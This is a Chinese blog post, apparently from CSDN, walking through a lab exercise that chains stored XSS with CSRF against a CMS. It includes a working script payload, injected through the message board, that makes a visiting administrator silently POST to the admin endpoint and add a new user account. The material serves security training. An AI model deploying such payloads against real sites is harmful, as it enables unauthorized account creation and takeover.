CSRF和XSS漏洞结合实战案例

最新推荐文章于 2024-07-10 17:49:24 发布
最新推荐文章于 2024-07-10 17:49:24 发布
阅读量278 收藏
点赞数
分类专栏: xss 文章标签: csrf XSS web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134384504
版权

文章目录

CSRF和XSS漏洞结合实战案例

实验环境为csm
在这里插入图片描述

实验原理

攻击者利用JavaScript可以构造请求的功能在留言面板构造一个存储型xss注入,里面的内容为js请求。请求新添加用户,注入完成后管理员访问留言管理时后台自动添加用户

实验步骤

信息收集

分析网站源码找到添加用户的页面

经过在网站下载的源码我们分析到添加用户的页面在user.action.php的页面使用post传递了三个参数
在这里插入图片描述

构造CSRF和XSS代码

用JavaScript编写一个请求将三个参数传递过去

<script>
csrfrequest= new XMLHttpRequest();csrfrequest.open("post","http://10.9.47.77/cms/admin/user.action.php",false);csrfrequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");csrfrequest.send("act=add&username=xl&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

xss注入

在留言面板进行注入
在这里插入图片描述
在这里插入图片描述

受害者登录后台查看留言管理

在这里插入图片描述
但是后台已经创建用户了
在这里插入图片描述

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版
03-06
Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版》是一份深入探讨Web安全领域的宝贵资源,特别关注了DVWA(Damn Vulnerable Web Application)这一广泛用于安全测试和学习的在线平台。该教程全面覆盖了2013年时...
WEB渗透学习-XSS-labs靶场
04-20
7. **安全编码实践**:靶场还会提供一些实际的编程案例,让你了解如何在开发过程中安全地处理用户输入,避免引入XSS漏洞。 通过XSS-labs靶场的训练,你可以系统地提升对XSS的理解,熟练掌握攻击和防御技巧。这个...
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 2895
该篇文章记录了xss+csrf的组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
CSRF+XSS组合拳实战
yuan_boss的博客
08-28 1627
由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。在实战中,如果我们发现了XSS存储型漏洞,我们也可以尝试寻找CSRF漏洞,进而扩大危害。
29.CSRF及SSRF漏洞案例讲解
mingyqf的博客
12-30 2818
CSRF&SSRF】—漏洞案例讲解—day29 一、CSRF—跨站请求伪造攻击 1、解释 CSRF漏洞解释,原理 CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 XSS 利用站点内内的信任用户,盗取cookie CS
XSS漏洞检测和利用
2301_80127209的博客
04-25 1006
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
这个“xss+csrf+html练习源码.rar”文件提供了针对这些漏洞实战练习,帮助安全研究人员或开发者加深对这些威胁的理解和防御能力。 XSS攻击主要分为反射型、存储型和DOM型三种类型。反射型XSS发生在用户点击链接...
安全之路:Web渗透技术及实战案例解析(第2版)
04-24
2. **漏洞分类与检测**:Web应用中的安全漏洞多种多样,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞等。书中将详细解析这些漏洞的成因、危害及检测方法,帮助读者识别潜在的风险点。 3. **...
内置16个漏洞的社团管理系统(信息安全靶场开发).zip
08-20
本文将深入解析一款名为“内置16个漏洞的社团管理系统”的靶场开发案例,旨在提高我们对信息安全的理解,提升系统的防护能力。 首先,我们要明确,安全靶场是一种模拟真实网络环境,用于测试和验证安全防御措施的...
CSRF靶场通关合集
weixin_72543266的博客
07-07 830
最进系统的将从web渗透到内网渗透的知识点做一个回顾,同时结合一些实战案例来演示,下面是对刚开始学习时对靶场的一个总结.
网络安全测评技术与标准
weixin_48579910的博客
07-06 952
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
网络安全----防御----防火墙安全策略组网
最新发布
NBbabay的博客
07-10 212
4,办公区分为市场部和研发部,研发部IP地址固定,访问DMZ区使用匿名认证,市场部需要用户绑定Ip地址,访问DMZ区使用免认证, 游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权限,门户网址地址10.0.3.10。5生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织结构,至少包含三个部门,每个部门三个用户,统一密码openlab123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
网 安 云
07-10 373
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 255
申请IP地址SSL证书
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1115
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全实验七(ISA防火墙的规则设置)
Elena's Blog
07-07 1047
(1)将host1的IP地址设置为172.16.学号.学号(2)将host2的IP地址设置为172.16.学号.1学号(3)将防火墙的内网IP地址设置为172.16.学号.250,IP地址设置为192.168.17.1学号(4)在防火墙上配置路由功能,并使内、外网之间能互相PING通(1)(2)(3)(4)
网络安全防御【防火墙安全策略用户认证综合实验
miss_copper的博客
07-10 777
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
中职网络安全B模块渗透测试server2380
网络安全技术分享
07-09 340
那么我们自行创建一个user和passwd的简易字典进行跑取密码 跑到了(此步骤可省略)scp 用户名@靶机ip/:图片路径 本地存放路径。进行登录uname -a。
csrfxss漏洞的区别
05-30
CSRF(Cross-site request forgery)和XSS(Cross-site scripting)是两种常见的Web安全漏洞,它们的区别如下: 1. 定义不同:CSRF是利用用户的登录态发起恶意请求,从而实现攻击目的;而XSS则是在网页中注入恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值